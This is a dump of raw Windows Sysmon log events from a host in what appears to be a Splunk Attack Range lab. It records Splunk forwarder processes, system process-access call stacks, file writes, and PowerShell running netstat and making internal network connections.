Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D00B9CDDB910F192A45ED9172388F83F,SHA256=3067090435E674F67205E0F271F6A7F154DD10627B0B9A8541CA6B3AD96DA19E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035344316Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:31.445{B81B27B7-752B-613B-7FB4-03000000C801}35322776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344315Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:31.146{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-752B-613B-7FB4-03000000C801}3532C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344314Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:31.146{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344313Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:31.146{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344312Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:31.146{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344311Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:31.146{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344310Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:31.146{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-752B-613B-7FB4-03000000C801}3532C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035344309Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:31.146{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-752B-613B-7FB4-03000000C801}3532C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035344308Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:31.131{B81B27B7-752B-613B-7FB4-03000000C801}3532C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035344339Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:32.914{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=987BFF39D456BA7148E8DC658EE6BCD5,SHA256=ADEA081D2887E15DD294F50FC49667EC4366A62A0077FC065B53A9864ABC6504,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035344338Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:32.514{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-752C-613B-81B4-03000000C801}6496C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344337Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:32.514{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344336Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:32.514{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344335Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:32.514{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344334Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:32.514{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-752C-613B-81B4-03000000C801}6496C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035344333Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:32.514{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344332Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:32.514{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-752C-613B-81B4-03000000C801}6496C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035344331Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:32.499{B81B27B7-752C-613B-81B4-03000000C801}6496C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000035344330Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:57.540{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52667-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035344329Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:32.165{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DD40269DD01764B16AB7E2738B327EC3,SHA256=D14A83C2F5958436CCE6E266338A7BE9995CAD758BD8C5E3A9309C08FACDA8A1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344328Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:32.164{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=492CF659BCDE2DBB3AC621D8AB026722,SHA256=91D67D261CC75AE254566DED964F6EF9AB16E0EF3035F4A60547A7C1B16D0354,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035344327Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:32.030{B81B27B7-752B-613B-80B4-03000000C801}17726784C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035344340Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:33.529{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DD40269DD01764B16AB7E2738B327EC3,SHA256=D14A83C2F5958436CCE6E266338A7BE9995CAD758BD8C5E3A9309C08FACDA8A1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035344342Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:59.223{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52668-false10.0.1.12-8000- 23542300x800000000000000035344341Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:34.161{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9D9B6AF94EF017B69581623A8170056,SHA256=028EC946D1B2EAC7144AB4ED8A009ABC9C58FFA81BC32CC6C04E6735A9177A8E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035344351Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:35.564{B81B27B7-9957-6127-D045-01000000C801}53121524C:\Windows\system32\conhost.exe{B81B27B7-752F-613B-82B4-03000000C801}6488C:\Windows\system32\NETSTAT.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344350Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:35.564{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344349Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:35.564{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344348Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:35.564{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344347Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:35.564{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344346Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:35.564{B81B27B7-4130-611D-9D00-00000000C801}31603656C:\Windows\system32\csrss.exe{B81B27B7-752F-613B-82B4-03000000C801}6488C:\Windows\system32\NETSTAT.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035344345Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:35.564{B81B27B7-4822-613A-788F-03000000C801}69404828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{B81B27B7-752F-613B-82B4-03000000C801}6488C:\Windows\system32\NETSTAT.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5b28184(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b